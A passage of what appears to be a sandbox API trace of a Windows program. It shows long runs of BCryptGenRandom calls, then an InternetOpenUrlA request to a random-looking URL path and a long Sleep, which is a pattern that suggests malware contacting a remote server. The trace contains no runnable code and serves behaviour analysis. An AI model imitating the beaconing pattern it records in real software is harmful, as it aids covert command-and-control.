(in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.541] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.541] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.542] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.542] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.542] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.542] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.542] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.543] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.543] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.543] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.543] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.543] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.544] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.544] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.544] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.544] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.544] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.545] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.545] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.545] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.545] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.545] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.545] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.545] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.546] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.546] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.546] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.546] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.546] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.546] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.546] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.546] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.546] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.547] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.547] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.547] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.547] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.548] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.548] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.548] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.548] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.548] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.548] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.548] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.548] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.549] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.549] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.549] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.549] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.549] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.550] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.550] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.550] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.550] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.550] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.550] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.550] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.550] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.551] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.551] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0216.551] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.957] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a030c6, cbBuffer=0x23, dwFlags=0x2 | out: pbBuffer=0x3a030c6) returned 0x0 [0216.958] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.958] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.958] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.958] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.959] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.959] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.959] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.959] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.959] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.960] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.960] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.960] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.961] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.961] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.961] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.961] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.961] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.961] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.962] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.962] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.962] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.962] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.962] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.962] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.962] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.962] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.963] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.963] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.963] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.963] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.963] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.963] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.963] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.963] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.964] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.964] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.964] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0216.964] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.964] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.965] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.965] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.965] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.965] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.965] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0216.965] GetProcessHeap () returned 0x440000 [0216.966] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x4741c0 [0216.966] lstrcpyA (in: lpString1=0x4741c0, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0216.966] lstrcatA (in: lpString1="\x04", lpString2="/6ua024WQerl9qcriLilqtl3x/Jsq556x35r2s7zylzj3/xyzwiwptxiMz8arwrfxngj8/53bjxkw4n0pdxiIupr6tjTGo9q5OocpgsodjRulc86xfg7z/exq37kdBa5huy8hfgn1aup5M81lohtw0gD/" | out: lpString1="\x04/6ua024WQerl9qcriLilqtl3x/Jsq556x35r2s7zylzj3/xyzwiwptxiMz8arwrfxngj8/53bjxkw4n0pdxiIupr6tjTGo9q5OocpgsodjRulc86xfg7z/exq37kdBa5huy8hfgn1aup5M81lohtw0gD/") returned="\x04/6ua024WQerl9qcriLilqtl3x/Jsq556x35r2s7zylzj3/xyzwiwptxiMz8arwrfxngj8/53bjxkw4n0pdxiIupr6tjTGo9q5OocpgsodjRulc86xfg7z/exq37kdBa5huy8hfgn1aup5M81lohtw0gD/" [0216.966] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0216.966] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/6ua024WQerl9qcriLilqtl3x/Jsq556x35r2s7zylzj3/xyzwiwptxiMz8arwrfxngj8/53bjxkw4n0pdxiIupr6tjTGo9q5OocpgsodjRulc86xfg7z/exq37kdBa5huy8hfgn1aup5M81lohtw0gD/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0216.966] GetProcessHeap () returned 0x440000 [0216.966] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4741c0 | out: hHeap=0x440000) returned 1 [0216.966] GetProcessHeap () returned 0x440000 [0216.966] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a03050 | out: hHeap=0x440000) returned 1 [0216.966] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0216.967] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0216.967] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0216.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0216.967] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0216.967] Sleep (dwMilliseconds=0x15280) [0218.517] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0218.517] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.517] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0218.517] GetProcessHeap () returned 0x440000 [0218.517] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xf7) returned 0x3a02350 [0218.518] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.518] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0218.518] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.518] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a02351, cbBuffer=0x28, dwFlags=0x2 | out: pbBuffer=0x3a02351) returned 0x0 [0218.518] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.518] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.518] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.518] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0218.519] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.519] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.519] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0218.519] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.519] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.519] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.520] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.520] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.520] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0218.520] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.521] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0218.522] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.522] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0218.523] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0218.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, 